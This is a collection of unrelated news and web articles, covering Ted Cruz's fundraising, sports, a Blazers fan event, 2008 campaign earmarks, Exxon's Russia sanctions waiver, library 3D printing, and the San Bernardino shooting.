The Texas Tribune thanks its sponsors. Become one.
“When it comes to fundraising, I think one of the greatest surprises, from the perspective of the Washington chattering class, has been the incredible, astonishing fundraising that this campaign has benefited from,” Cruz said Monday in Houston, where he announced that six wealthy supporters of former Texas governor Rick Perry are now backing him.
Among them were Deason, who gave $5 million to a pro-Perry super PAC in June, and Dallas tax consultant G. Brint Ryan, who donated $250,000. Such high-capacity supporters could inject huge sums into a group of super PACs supporting Cruz, which reported raising $38 million by the end of June.
Campaign finance filings show that more than half of Cruz's max-out donations are coming from his home state, Texas, where he is methodically bringing longtime backers of Perry and the Bush family into his fundraising network.
Houston real estate developer Welcome Wilson Sr. was supporting Perry until he dropped out of the race. He has close ties to the Bush family — his son Welcome Wilson Jr. went to school with Jeb Bush — but said he was convinced that the senator from Texas could best capture the imagination of the voters now considering Donald Trump.
“Their support comes from the same type of people — the people who want a change,” Wilson said.
Mosbacher, whose late husband, Robert Mosbacher, served as commerce secretary under George H.W. Bush, considers herself more of an “establishment type.” She decided to back Cruz because she is convinced that he can win.
Cruz's wife, Heidi, has also been a key asset, said Mosbacher, pinch-hitting at fundraisers when her husband gets stuck in Washington. At one recent breakfast in Houston, she was so effective that she won over attendees who had not yet committed to the campaign.
“I was very surprised who wrote checks,” Mosbacher said. “They weren't sure about Ted Cruz until they met Heidi.”
Heidi Cruz has said she made 600 fundraising calls in the second quarter, typically reaching 20 to 25 people a day.
“I don't want to say it's easy, and I don't close every deal,” she said last month. “I think people want to be a part of something that addresses the main issue of the day, number one, which is Washington versus the people.”
She has even been reaching out to bundlers who are already backing other candidates. Andrew Sabin, a Jeb Bush supporter who has had the Cruz family to his Long Island home and supported Cruz's Senate campaign, said she gave him a call this month.
“I love his wife,” Sabin said — but he told Heidi Cruz that he is “100 percent” with Bush.
Others are coming over. Chart Westcott, a Dallas biotech investor, switched his allegiance to Cruz after his first choice, Wisconsin Gov. Scott Walker, dropped out of the race.
Westcott, who supported Cruz's Senate bid, said he was pleased to hear the granular details of how Cruz's team is playing the long game and placing a “laserlike” focus on amassing delegates, a pitch that campaign officials also made at the recent donor retreat in Park City.
Westcott is also impressed by Cruz's ability to draw in both large- and small-dollar donors.
“I think when you look at the financial shape of all the campaigns,” Westcott said, “Cruz has proven himself to be a powerhouse on both sides of the ledger.”
by Karam Elahi
Weâ€™ve caught the contagion. Weâ€™ve been corrupted by the plague. A dangerous and deep-seated urge is sloooowly taking over us, compelling us to… Spread the Infection.
Spawners, help us Spread the Infection, and win a boatload of tainted, zombie-themed games like:
Prize 1 (July 30th): Left 4 Dead 1 & 2 bundle
Prize 2 (Aug 1st): Amnesia: Dark Descent + Infestation: Survivor Stories
Prize 3 (Aug 3rd): The Complete Alan Wake Collection + Killing Floor
Prize 4 (Aug 5th): Deadlight + The Walking Dead Collection (Season 1 and 400 Days)
Starting today, Monday, July 29, all the way to August 5th, weâ€™re giving out Apocalyshcious games every two days. How can you win? Itâ€™s as easy as chomping down on some succulent brains. Read on.
Eligibility:
To even qualify for winning our infected prizes, you have to Follow us on Twitter, AND Like us on Facebook. For all of our current fans, donâ€™t worry; as long as you have already Liked and Followed us; youâ€™re eligible. Please remember, the prizes are distributed via US Steam Codes, so the contest is open to residents of the US and Canada only.
How to Win:
Simple. Gather enough points every 2 days as follows:
Tweet contest details (1 point)
Share Facebook contest post (1 point)
Like Facebook post (1 point)
Comment in the Facebook posts for the contest (1 point)
You can win a maximum of 4 points every two days. A winner will be announced on Facebook and Twitter between 6-7 PM every 2nd night, and he or she will be sent the Steam codes via email, or gifted the code if they already have a Steam account.
Remember, every two days, the points are reset for all contestants. This means that you can gain points multiple times in that window. And even if you win a prize, you are still eligible to win another one once the contest resets every 2nd day.
So good luck, Spawners, and help us Spread the Infection!
By Kim Segal, CNN
Golf is how K.J. Choi makes his money. Donations are how he likes to spend a lot of it.
"I believe in sharing," says Choi, a pro golfer from South Korea who gave away over $300,000 that he earned on this year's PGA Tour. "A lot of people make money but we all live in a society where we need to share."
He has pledged $200,000 of the $1.71 million that he won at last month's Players Championship in Ponte Vedra Beach, Florida to victims of the deadly tornadoes that recently struck the American South.
"When I see people suffering, that hurts me a lot, too," Choi, who is playing in the U.S. Open this week, said in a telephone interview.
Sports Illustrated senior writer Damon Hack said that news of Choi's tornado donation didn't surprise him.
"That's just kind of the person that he's been," Hack said. "He seems to kind of have that good world view to know that there are a lot of things going on bigger than the sport."
Considered Asia's most successful golfer, Choi has also started his own charity to support underprivileged children, the K.J. Choi Foundation.
The 8-time PGA Tour champion says his donation to the tornado victims was a kind of thank you to the country that gave him the opportunity to succeed.
Choi lives in Texas but frequently visits his homeland.
As a member of the U.S.-based PGA tour, he has played against the best golfers in the world, competing for some of the sport's largest first-place prizes.
He's known around the clubhouse for showing his appreciation. "He thanks everybody. He thanks the golf course superintendent, the tournament host but he also thanks God," says Hack. "He's not afraid to talk about his beliefs."
Choi has a reputation for being a devout Christian. He and his family are members of the Dallas Korean United Methodist Church in Texas.
"The Lord has been good to me and he has provided a lot for me so this is my way to return of all the things that he has given to me," he says.
"Golf is not an easy game. It takes a lot of hard work and training and there are times when it is hard on me, too," he says. "But when I seem to be facing a brick wall that's when I turn to the Lord because I know he's watching over me."
Get the biggest Liverpool FC stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
Jordan Henderson admits playing in a Liverpool FC squad without Steven Gerrard is “unimaginable”.
And so the Reds vice-captain hopes Gerrard signs a new deal and finishes his playing career at Anfield.
Henderson has heaped praise on the Liverpool skipper following his man-of-the-match performance at Leicester City on Tuesday night.
Gerrard scored to put Brendan Rodgers' side ahead at the King Power Stadium and Henderson has labelled the 34-year-old as a “role model” for everyone in the squad.
“I hope he stays on for as long as he can while he is playing,” said Henderson.
“Even after that, I want him to stay on for as long as possible. He has been the best player, I think, for a number of years.
“Not just for Liverpool but in the Premier League. And I think he still is. I hope we keep him because he is a massive player for us and a great leader.”
Henderson added: “Everyone has got a lot of respect for him. He leads by example.
“He is a top player but he is also a top person. The lads can go to him with anything. He will always help them out and put them first. That is massive as a captain. Everyone gets on really well with him.
“If he was to go, he would be a massive loss. Hopefully it doesn't come to that.
“With the aura that he has got, he could be a different person. But he is very grounded, very humble.
“We can go to him with anything and he will help us out with anything. That is priceless.
“Then he puts in performances like that. He is a role model to us all.
“Every single member of the squad hope he stays for many years to come.”
Henderson admits the prospect of Liverpool without Gerrard does not bare thinking about.
“Steven knows his own mind and what he wants to do,” he said.
“It is down to him, the club and his representatives to sort it out.
“He is huge for us and we need to keep him for as long as we can.
“Liverpool without Steven Gerrard is unimaginable.
“Nobody wants to lose him – I'm sure the club feel that way as well.”
Last night before the game, General Manager Neil Olshey and President / CEO Chris McGowan addressed a gathering of Season Ticketholders in what has been dubbed "The State of the United". They both spoke candidly about issues surrounding a franchise they have helped to instill with vibrancy and a world class atmosphere, and, best of all - wins.
For 45 minutes they held court, mostly fielding pre-selected questions from those in attendance (mine was not chosen…I forgot what it was, but trust me, it was awesome), while opening the floor to a couple other questions at the end.
Olshey was the star of the show, getting the bulk of the attention – and rightfully so, as architect of the Blazers' renaissance on court – while McGowan managed to look artful while slogging through some thornier questions from budget-conscious consumers.
In his opening remarks, Olshey was quick to acknowledge the importance of the commitment of Blazer fans in building something special. "We've become very used to the impact that the fans have…but you bring in someone like Arron Afflalo, and Arron sees the reception he got when he entered the game for the first time the other night….he never had that at UCLA -- it was a little bit apathetic in Los Angeles -- he didn't have that where he just came from…Seeing it through his eyes, the passion that you guys bring…[it's why we] consider ourselves to have the best homecourt advantage in the NBA."
Compliment fans, check. Bring up game-changing trade that you just made, check. This guy knows how to warm up a room.
Of course the trade was a big topic of conversation. Olshey gave us a look through his wide-view lens on his choice of target.
"Once we saw what [our core] group was capable of, and how important the role of chemistry plays in our success, we were very reluctant to bring in anyone from the outside who might interfere with [our] chemistry."
"I have a relationship with Arron. I've known Arron since he was a high school player at Centennial Compton, I knew him through his years at UCLA, I worked him out when he was playing for the Denver Nuggets back when I was coaching [Olshey was an assistant coach for the Clippers in 04-05], so I was very comfortable bringing him into our culture. And that was as important for us as his skill set."
"We have a [specific] paradigm that we look at [and] everyone had to meet a certain six point criteria to bring them in…it limited the scope of players we looked at, but when we brought Arron in, we knew he would assimilate immediately, and he has."
Olshey went on to note that he expects one of the knock-on benefits of Aflalo's presence will be to take some defensive pressure off Wes Matthews so he can focus more on the offensive side of the ball.
He also made a pretty strong endorsement of the other new Blazer: "I think Alonzo [Gee] is a little bit unsung…but he's probably one of our best on-ball defenders…he replaces[s] a little of the energy lost with having to include Will Barton in the deal to make the math work."
At this point, someone in the crowd yelled "Good Trade!"…prompting applause from the whole room.
He was then asked which players he considered priorities to resign, which he very nearly reduced to a non-question:
"We have been very consistent in that once we realized that this core was capable of competing at a high level, we would keep this core together… When you have an owner like Paul Allen, it completely eliminates economics as an obstacle in keeping a team together – we will have every possible ability to keep this group together, and not only keep this group together, but add to it." This statement was again met with rousing applause.
A question regarding the tools the team uses to determine player acquistions further prompted meditations on both process and philosophy.
"We're looking at talent, chemistry, character. Players have to hit on all three…It's a multi-pronged evaluation process. We use intel, analytics, live scouting, tape, how they fit on the court, what their background is… All of this goes into every decision we make, because you can't survive bad decisions in this league…When you're losing you can take risks, and we probably took more risks as a 33 win team than we will now as we're not looking to jeopardize a 54 or 55 win team over what may or may not be an incremental offering."
"It all comes down to cost-benefit. When we add a player, we want to know as certain as possible that this guy is going to be an upgrade, not just in terms of his play on the court, but what he does for the overall organization. And that's why I think we've been very judicious."
As far as his decision-making style, he proclaimed himself "a big collaborator. I don't want to be the smartest guy in the room; I rarely am, so I take everyone's opinion into consideration."
He also emphasized that the most important moves are not necessarily the splashiest: "At the end of the day you start winning in the margins, making good decisions involving smaller deals – [with] the big deals…you know exactly who you want to sign."
Olshey then expounded on the kaleidoscopic view necessary to his job, which makes the Aflalo deal sound like a work of art years in the making:
"That deal would not have come had Will Barton had not become a player, had Thomas Robinson's contract option been picked up… which I know some people in this room were vilifying me for not picking it up and instead picking up Meyers Leonard's option. So it's the GM's job to look around and see potential issues that may come up, and one of those knew we were going to need to use Thomas at some point in a deal."
[Just to check those that are asking themselves, "Will Barton became a player?" – he has scored 22 in each of his last two outings. Yes it's for Denver. Just sayin'. Fascinating stuff about the machinations behind T-Rob's option though.]
Olshey acknowledged the shift in mindset that this recent deal signals, an approach that has been slowly evolving over the past two years. For example, the decision to hold onto his 2013 draft picks instead of dealing them at the time for immediate help was key to the retooling thought process – "knowing we were going to need one more year before we were going to be able to compete at the highest level. So those macro decisions we make are what goes on behind the scenes, but I can assure you that we were working to improve the team every day."
Well, the results speak for themselves.
Speaking of results, Olshey did not spare praise for the tireless work of the coaches in the development of Meyers Leonard, as well as the hard work the young man himself has put in – while reminding us that Meyers is the youngest guy on the roster.
He went on to discuss philosophy in regards to player development: "As an organization, you are always in the development phase with someone on your roster – the difference with us is we are not doing it at the expense of winning. We're not willing to play our young guys just for the sake of playing them."
"Myself, Terry – we're big believers that you learn more from sitting and winning than playing and losing. And we want guys to understand what it takes to win in this league, to play meaningful games…So while you may not see Allen Crabbe, C.J. McCollum, and Meyers Leonard on a nightly basis, they are all ready to contribute in a winning environment now…and look, I hope they don't get an opportunity because it means that we're 100% healthy."
He also addressed the small market complex we Portlanders seem to have, embodied by the question "What do we have to do in order to prove that we're elite to the rest of the country?" Olshey feels we already have – as shown by two ESPN games this week against top teams…who also happen to be small market.
"If you look at the playoff seedings, 4 of the top 8 teams in the [Western Conference] are 4 of the smallest markets in the league, and that's a byproduct of where the collective bargaining agreement is going, giving teams in every kind of market the chance to win a championship. Today what fans of basketball want to see on television is quality basketball…and I think that's why you see us on national television two times this week."
He went on to boldly cast off the cloak of small market financial constraints: "We may be a small market team in terms of population, but again when you have an owner like Paul Allen and a fanbase like we have, we operate as a big market franchise. Again, economics are not an issue in our decision making matrix…The difference between small and big markets are commitment to the expenditures on your player payroll, which I can't reinforce this enough, is never going to be an issue as long as we're here, as long as those players are players that give us the best chance to win a championship."
Chris McGowan, meanwhile, had some interesting revelations of his own – he believes printed game tickets will be completely obsolete within a couple of years; ticket price changes are determined after studying '50 or 60 different variables', including area rates of employment; and the Rose Quarter Campus is in preliminary discussions to go completely ‘smoke-free' (a statement met with clear approval).
As far as arena improvements goes, new additional speakers have recently been installed in the ‘end zone' on each side of the court to upgrade sound, and more food carts and points of sale will be added to both the lower and upper concourse to alleviate long lines for popular concession items. He also addressed a fan's concern that ‘there is too much going on' during timeouts and such that take away from the game.
"We have scaled back [in-game entertainment], and we continue to scale back – we want the game to be the focal point. For example, when we are on offense, no music is playing. That's rare in the NBA these days."
He also foresees more public charity events which would allow fans to interact with players.
McGowan didn't dodge the tough questions, either: like, why are there no physical coupons for French fries when the Blazers score 100?
"We were thinking of bringing the Chalupa back," McGowan said facetiously, and was met with some scattered ‘Cha-lu-pa' chants. But as it turns out, there was a coupon counterfeiting issue (?!) – so if you want fries, download the McDonald's app…or find a friend who will. Anyone in Oregon or Southwest Washington can claim the fries after a 100 point performance.
When asked about the process in place to get the All-Star game in Portland, he seemed hopeful but realistic. "We are in the mix more than we've ever been but it's still going to be tough. There are many new hotel projects that should improve our chances…there's 5, 6, 7 big hotel projects on the horizon."
As the event wound down, a ticket holder upset about pricing changes was invited by McGowan to speak afterwards. I grabbed some food, a drink, and about 30 minutes later, not long before tipoff when the room was clearing out – I finally remembered the question I wanted to ask. And a good thing too – since McGowan was still around, casually talking to any fan who strolled up to him.
He introduced himself to me, like we were just meeting at a party, with a real easy and friendly manner. For a guy who started in ticket sales and worked his way all the way up, he certainly still has an 'everyman' touch about him. I complimented him on the great job he and his team were doing – "I think everyone sees it," I said. After buttering him up, I moved on to tightening the screws – are there any plans to bring back streaming games online?
The answer was no – not in its past guise anyway, where there were many complaints about the quality of the product. He assured me there was a plan in the works to get Blazers games available to anyone who wanted them, and that CSNNW would soon be joining the "TV Everywhere" revolution, so that cord-cutters would be able to watch without a TV. That's good to hear, because that's more than I got out of Comcast the last several times I've asked them.
So it seems everyone in this organization is ready to give a little bit extra. Keep it coming!
Palin, McCain contradicts each other on spending
Republican vice presidential nominee Alaska Governor Sarah Palin (L) talks to Charles Gibson while walking alongside the Trans-Alaska Pipeline during an interview in Fairbanks, Alaska September 11, 2008. As governor of Alaska, she raised taxes on oil companies and clashed with them over a planned pipeline through her state. less Republican vice presidential nominee Alaska Governor Sarah Palin (L) talks to Charles Gibson while walking alongside the Trans-Alaska Pipeline during an interview in Fairbanks, Alaska September 11, 2008. As ... more Photo: ABC, Donna Svennevik Photo: ABC, Donna Svennevik Image 1 of / 5 Caption Close Palin, McCain contradicts each other on spending 1 / 5 Back to Gallery
In a televised interview Friday, Alaska Gov. Sarah Palin defended her request for an estimated $200 million in federal projects from Congress - even as earlier in the day her GOP running mate John McCain insisted Palin had never sought money from Congress.
In a second ABC interview with Charlie Gibson, the GOP vice presidential candidate acknowledged that she has supported millions of dollars in congressional money - including the famed "Bridge to Nowhere" - to allow Alaska "to plug into ... along with every other state, a share of the federal budget in infrastructure."
But she said she and McCain would seek to reform that system.
She also told Gibson that Democratic presidential candidate Barack Obama probably regrets not naming Sen. Hillary Rodham Clinton to be his running mate - and dismissed as an "old wives' tale" reports that she had tried to ban books in public libraries.
McCain, for his part, faced an even tougher grilling on the usually friendly daytime show "The View," where hosts including Barbara Walters, Joy Behar and Whoopi Goldberg jabbed him on issues like abortion, his "maverick" record, separation of church and state, and his campaign attack ads.
Asked by Walters about Palin's statements that she would reform Washington, McCain insisted that she would "reform all of Washington, just like she did ... in Alaska. Earmark spending, which she vetoed half a billion dollars worth," said McCain.
When reminded by Walters that Palin took earmarks in Alaska, McCain said, "Not as governor she didn't."
"She took government out of the hands of the special interests," he said.
Independent analysts and the Web site of Sen. Ted Stevens, R-Alaska, have both noted that under Palin's leadership as governor, Alaska has requested 31 earmarks worth nearly $200 million - an amount that taxpayer groups say places Alaska as the per capita leader on such fundraising.
McCain appeared a little riled when Behar aggressively challenged him on his latest campaign ads - one accusing Obama of supporting sex education for kindergartners and another suggesting sexism in the use of the phrase "putting lipstick on a pig."
"Those ads aren't true. They're lies," said Behar, as Walters noted that McCain himself used the lipstick phrase to describe Clinton's health care proposal.
"They're not lies," McCain said, adding that Obama "chooses his words very carefully ... this is a tough campaign. And he shouldn't have said it."
The focus on the interviews by the two members of the Republican ticket comes as Obama and his campaign said it is turning a new page - and taking a tougher new tone - in confronting what it says have been lies and misrepresentations from the GOP candidates.
Obama's campaign said the GOP team's recent appearances show that the Arizona senator "would rather lose his integrity than lose a campaign."
And it released two aggressive new ads - one based on a McCain interview in The Chronicle - in which it suggested that McCain is out of touch on issues like technology, and that his campaign is populated by Washington lobbyists.
But Democrats have been increasingly nervous since Palin fired up grassroots Republicans and shot energy into McCain's campaign when she was named his vice presidential choice. New national polls show that McCain and Palin have erased leads by Obama and his running mate, Delaware Sen. Joe Biden, especially among white voters. That prompted Obama to reassure Democrats on Friday that he would ramp up aggressive efforts to challenge the Republicans.
"You know, I'm not going to be making up lies about John McCain," Obama told voters in Dover, N.H., but reprising an old saw, said that, "If you don't stop lying about me, I'm going to have to start telling the truth about you."
Meanwhile, Behar appeared to get under the GOP candidate's skin when she suggested that McCain - who has shifted his positions on offshore oil drilling, making President Bush's tax cuts permanent and caps on greenhouse gas emissions - has lost his maverick status and is now in lockstep with Bush's policies.
"What specific area have I, quote, 'changed?' " he said. "Nobody can name it."
Palin, meanwhile, faced off with Gibson, who noted that the millions of dollars in Alaska earmark requests constitute 22 times the per capita amount of federal earmark dollars for Obama's home state of Illinois - and included costly projects such as studies on the mating habits of crabs and harbor seals.
"We have dramatically, drastically reduced our earmark requests since I came into office," said Palin. She said those requests came through "our research divisions" and universities, but they should be made "in the light of day, not behind closed doors," she said.
FILE - This Jan. 30, 2012, file photo, shows the sign for the Exxon Mobil Torrance Refinery in Torrance, Calif. On Friday, April 21, 2017, the Trump administration denied a request from Exxon Mobil to waive U.S. sanctions against Russia and allow it to resume oil drilling around the Black Sea. (AP Photo/Reed Saxon, File)
WASHINGTON (AP) — The Trump administration has rejected a request from Exxon Mobil to waive U.S. sanctions against Russia to allow the company to resume oil drilling around the Black Sea.
Treasury Secretary Steven Mnuchin said Friday in a brief statement that the administration “will not be issuing waivers to U.S. companies, including Exxon, authorizing drilling prohibited by current Russian sanctions.”
Exxon said it understood the decision, while suggesting that the outcome will merely help European oil companies operating under less-stringent restrictions.
The decision comes just two days after it was reported that Exxon was seeking a waiver to resume a joint venture with Rosneft, a Russian state-owned oil company. Exxon said it filed the request in 2015.
The disclosure of Exxon's application was criticized in Congress by lawmakers who said the Trump administration should not reduce sanctions after U.S. intelligence agencies concluded that Russia interfered in last year's presidential election. Sen. John McCain, R-Ariz., tweeted of Exxon's request, “Are they crazy?”
Secretary of State Rex Tillerson was Exxon's CEO before joining President Donald Trump's cabinet. While at Exxon, he cultivated close ties with Rosneft and Russian officials including President Vladimir Putin, and he spoke against sanctions that were imposed in 2014 in response to Russia's annexation of the Crimea region of Ukraine.
The sanctions bar U.S. oil companies from transferring to Russia the advanced technology that is used to drill more efficiently offshore and in shale formations. Exxon has said in regulatory filings that the sanctions could lead to losses of up to $1 billion.
An Exxon spokesman said the company's application for a waiver was made to meet contractual obligations under a joint-venture agreement in Russia, “where competitor companies are authorized to undertake such work under European sanctions.”
Rosneft officials have said that their joint venture with Italy's Eni S.p.A. plans to begin drilling this year in the Black Sea next to the area where Exxon hoped to drill.
Under Treasury Department rules, ExxonMobil could resubmit its application if it provides additional information the government hadn't reviewed previously.
Irving, Texas-based Exxon has disclosed receiving three waivers from the sanctions during the Obama administration for limited work with Rosneft.
Exxon's critics urged the Treasury Department to block more waivers, which they feared would give new momentum to drilling in the environmentally sensitive Russian Arctic.
Shares of Exxon Mobil Corp. fell 32 cents to close Friday at $80.69.
___
Koenig reported from Dallas.
What if all it took to gain access to the technology of 3D printing was your plastic library card? Considering it's been hard to even find a book about 3D printing at the library, and the supply of new tomes on the shelves seems to be dwindling, I've been worried the library itself may be turning into an antiquated institution, squeezed out of existence by electronic, paperless options.
It's exciting to hear that with a number of 3D printing programs on the horizon libraries will be enticing budding geniuses and technogeeks back into those big buildings filled with books. While it's a game changer for sure, allowing innovators of all ages to have access to what they need, a host of concerns and questions follow in offering technology that has the potential to break so many barriers.
You may not be aware that right now there are 250 libraries in the US that offer 3D printers to patrons, according to OITP Perspectives, a publication by the American Library Association (ALA). From Boy Scouts making actual functioning automotive wheels to students producing prosthetic hands, these 3D printers are helping to accomplish noble tasks, and are spreading the STEM curriculum to the communities.
The crucial element in libraries getting involved in 3D printing is that it is free. While it's not so hard to get your hands on or get to a PC or printer, it is for most people nearly impossible to get to a 3D printer or, even further, to buy their own. Affordability in general is one of the biggest issues with 3D printing — and while desktop 3D printers are becoming more and more affordable, there is still expense involved, not to mention software, materials, and maintenance. Many individuals want to try their hand at the new technology, and prefer to dip their toes in gingerly at first before diving head — and wallet — first into the maker movement. With a learning curve associated with digital design and 3D printing, libraries offer a great benefit, doing what they do best: offering a safe, quite haven for learning.
The 3D printers established in current libraries are there first and foremost to light a fire under students regarding science, technology, engineering, and mathematics. In line with the Obama administration's agenda to promote STEM education, the Institute of Museum and Library Services (IMLS) and the John D. and Catherine T. MacArthur Foundation launched the Learning Labs in Libraries and Museums program. Twenty-four counties and cities received $100,000 in grant money each to create areas for teenagers to learning about 3D printing in what they refer to as ‘Learning Labs,' with two of these successfully up and running in Colorado currently.
With the current smattering of libraries offering 3D printing services for free (with users providing their own materials for the printing), the enthusiasm level grows along with the educational level and the furthering of the STEM agenda. Libraries also often offer lecture series on the subject as well as hosting events.
The list of issues that arises though are:
Maintenance of expensive, high-tech equipment
Training of library staff
Economic considerations
Content being printed
Public Policy considerations
Legal issues
Librarians would have to do more than just wing it with the new and sometimes complex technology suddenly available. Invariably, patrons have questions, printers get hung up and need maintenance or explaining, a variety of materials come into play, and so on. This means considerable education or the need for onsite 3D printing specialists within the libraries.
And while libraries may be giving out the technology for free, potentially, the money has to come from somewhere. Currently, it is beginning to flow from numerous entities, whether they are government grants to bigger libraries, or funding within schools on the elementary and secondary levels. Many colleges and universities are allocating a portion of their budgets to purchase 3D printers for their science labs and their libraries — and these funds are certainly not going to waste, as students are 3D printing everything from advanced arts and crafts projects to automotive parts and medical devices.
Larger manufacturers are also getting involved with offering donations, incentives, and discounted educational packages for schools and their libraries, as they see the bigger picture — the imminent need for those with experience in 3D printing and peripheral skillsets in the workforce.
The biggest proponents of this integration of 3D printing into schools so far have mainly been names like 3D Systems, Canada's Tinkerine, and MakerBot. 3D Systems, in their great wisdom for seeing the need to spread the word of 3D printing to the communities — and acting on it — has also instituted a MakerLab Club, in collaboration with the ALA and Association of Science and Technology Centers. This club benefits libraries and museums, and their patron ‘makers' who truly show a dedication to digital design and 3D printing. These libraries and museums receive multiple 3D printers, workshops, webinars, discounts, and a wide range of access to instruction.
With all the elements in place for offering the equipment to the public comes the immediate need for managing it and looking ahead to potential concerns. The ALA is right on target with issues regarding what could be potential copyright issues and more. With a number of libraries operating in different places with different people and different projects in progress, it's hard to say though what subjective scenarios could develop, obviously.
“Given the many legal questions 3D printing gives rise to, libraries need to do more than provide their patrons with instruction in the basics of printer mechanics, maintenance, modeling and scanning,” states Charlie Wapner in his recent article for the ALA publication, OITP Perspectives, titled “Progress in the Making: 3D Printing Policy Considerations through the Library Lens”. “It is in our best interest to think chiefly about what is practicable and consistent with the mission of libraries [in serving the public], and secondarily about what might eventually be held by Congress, regulatory agencies, the state legislatures or the courts to be outside the bounds of the law.”
Whilethere are certainly a host of legal issues to crop up in the future, it's uncharted territory right now. Copyright and trademark laws have the potential to come into question. The question of freedom of expression and what laws apply to 3D scanning and printing are still pretty fuzzy. The ALA is of course looking to ward off any potential issues considering the line between free expression and the controversy regarding issues like the 3D printing of guns which is beginning to force regulation. There are also other concerns down the line with 3D printing of items like medication, drugs, and even fake postage and counterfeit money.
“If library professionals familiarize themselves with the budding policy debates surrounding 3D printing, they can help shape the laws, regulations and corporate policies that coalesce around this technology in the coming years. One goal of our workaround 3D printing is to make this possible,” said Alan S. Inouye, director of the ALA Office for Information Technology Policy.
It's one thing to put 3D printers in libraries, but another altogether to expect them to police them. There is talk of a digital monitoring system being integrated into the printers themselves, along with the idea that librarians could post legal information regarding photocopying laws, and copyright and intellectual property laws near the 3D printing areas. While that leaves interpretation of the law up to everyone in question, it is in some way a method to deal with possible legal issues – sort of like signs at a public pool that say “no running.”
It's hoped that, with the amount of enthusiasm and positivity that the technology is offering, problems would be kept to a minimum as citizens respect the privilege of having such expensive resources offered at no cost. The amount of good being done certainly outweighs the current potential negatives, with the idea being to educate people and offer students skill sets previously unheard of.
It's easy to see what will happen when 3D printing resources are offered to the community at no cost. Creative people will flock to the technology and will continue to use it with inspiration and innovation. Digital design and 3D printing is a technology that applies to numerous disciplines, imbuing them with momentum and propelled by creative, human spirit. Have you been to a public or school library recently that offered 3D printing? What do you think of the legal issues and need for public policies surrounding 3D printing in U.S. libraries? Discuss in the Public Libraries to Offer 3D Printing forum over at 3DPB.com.
[Source: OITP Perspectives, ‘Progress in the Making: 3D Printing Policy Considerations through the Library Lens,' by Charlie Wapner
A British traveller was kicked out of Thailand by border officers after ripping pages out of her passport to use as toilet paper when she was drunk. Faye Wilson was forced to turn back at the Thai airport and was escorted all the way back to the UK by a security guard after they spotted the missing pages.
Faye Wilson had used pages from her passport as toilet paper Credit: SWNS
She said she had been too mortified to reveal the truth and tried to claim she had "lost" them - but the sceptical officers promptly deported her. Meanwhile, the friend she was travelling with has stayed in Thailand. What's more, she said she does not remember much about the night in question. "We were walking from one bar to the next and we must have been desperate for a wee and obviously didn't have any toilet roll," she said. "We decided it would be a good idea to use my passport, which is obviously really stupid. "It was maybe two or three pages. I was a bit drunk so didn't even think about the consequences."
Faye has now had to apply for an emergency passport Credit: SWNS
Come one, come all to MetLife Stadium on Sunday. The C students. The 12-handicap golfers. The middle managers.
The occasion? A daylong celebration of the ordinary and the middling — warm coffee, half-cooked hot dogs and watered-down beer will be served — with the marquee event beginning at 1 p.m. That is when the game most emblematic of this N.F.L. season will kick off.
Jets versus Giants in the Mediocrity Bowl. In this parody of parity, the winner enhances its postseason standing while the loser suffers the indignity of still remaining relevant in the playoff chase.
Only seven of the league's 32 teams are 7-4 or better, the fewest at this stage of the season since the N.F.L. expanded to 32 in 2002. The pileup of teams — 13 in all — at 6-5 (the Jets, losers of four of their last six, among them) or at 5-6 (hello, Giants, also losers of four of six) is the most over the first 12 weeks of a season.
C4L Urges NO Vote on USA Freedom Act
Last night, Senate Majority Leader Harry Reid filed cloture on the USA Freedom Act. The legislation is sponsored by Senator Patrick Leahy (D-VT) and while it does slightly curtail the NSA's ability to spy on law Americans, it also extends the Patriot Act until 2017. Currently, the Patriot Act is scheduled to expire in June 2015.
Campaign for Liberty, along with Senator Rand Paul (R-KY), are opposed to the USA Freedom Act because of this extension of the Patriot Act. A senior Paul aide told CNN last night that, "Due to significant problems with the bill, at this point will oppose the Leahy bill."
Campaign for Liberty is strongly opposed to extending the Patriot Act until 2017 in exchange for tinkering around the edges of civil liberties reform. C4L members who oppose the Patriot Act should contact their Senators at 202-224-3121 and tell them to oppose the USA Freedom Act.
Back in September, Campaign for Liberty joined with other civil liberties advocates, organizations and whistleblowers to urge members of Congress to oppose the NSA "reform" bill known as the USA FREEDOM Act (S. 2685).
Coalition Letter Opposing USA FREEDOM Act
Tags: Rand Paul
REDLANDS (CBSLA.com) — Authorities on Wednesday night continued to investigate a Redlands home tied to Syed Farook, a suspect identified in connection with the mass shootings that killed at least 14 people and injured at least 17 people at a social services center in San Bernardino on Wednesday morning.
A few hours after the mass shooting, authorities followed a tip to the home on Center Street in Redlands. As officers approached, the suspects fled in a dark SUV. A police pursuit ensued, ending back in San Bernardino, where a gun battle broke out.
Two suspects — one male and one female — were killed in the shootout, Burguan said. He said both suspects were armed with assault rifles and handguns. A third person who fled from the shooting scene was detained after an extensive search. It was not immediately clear if that person was involved in the Inland Regional Center shooting.
One police officer was wounded in the shooting, apparently from a ricochet, but was not seriously injured.
As darkness fell, police continued to search the home in Redlands. Officers entered the home with a battering ram and were taking precautions due to a belief that the home could be rigged with explosives.
It was believed that the Redlands home was the home of Syed Farook's sister and mother.
The second shooting suspect who was killed in a shootout with authorities was identified as Farook's wife of two years, Tashfeen Malik, 27.
Neighbors in Redlands were shocked that the suspects had ties to their area.
“I was in awe that it was happening four houses down from my property,” one neighbor said.
A man who has been working in the area said he noticed a half-dozen Middle Eastern men in the area in recent weeks, but decided not to report anything since he did not wish to racially profile those people.
“We sat around lunch thinking, ‘What were they doing around the neighborhood?'” he said. “We'd see them leave where they're raiding the apartment.”
(©2015 CBS Local Media, a division of CBS Radio Inc. All Rights Reserved. This material may not be published, broadcast, rewritten, or redistributed. Wire services contributed to this report.)
The White House, aided by Sen. Tom Carper (D-Del.), is working hard to crush an amendment being pushed by Sen. Byron Dorgan (D-N.D.) to allow for the reimportation of pharmaceutical drugs from Canada, Senate sources tell the Huffington Post.
As a result, the Senate health care debate has come to a standstill: Carper has placed a "hold" on Dorgan's amendment and in response, Dorgan tells HuffPost, he'll object to any other amendments being considered before he gets a vote on his.
Sen. Olympia Snowe (R-Maine) is a lead co-sponsor of Dorgan's amendment. She said she's confident that, as of now, they have the votes they need. "I think that's why we're not having this vote," she said, smiling. The amendment has the support of a number of other Republicans, including Sens. John McCain (Ariz.), Charles Grassley (Iowa), John Thune (S.D.) and David Vitter (La.).
Opponents of the amendment worry that many more Republicans may join the amendment not because they agree with it, but because they want to put the health care bill in jeopardy.
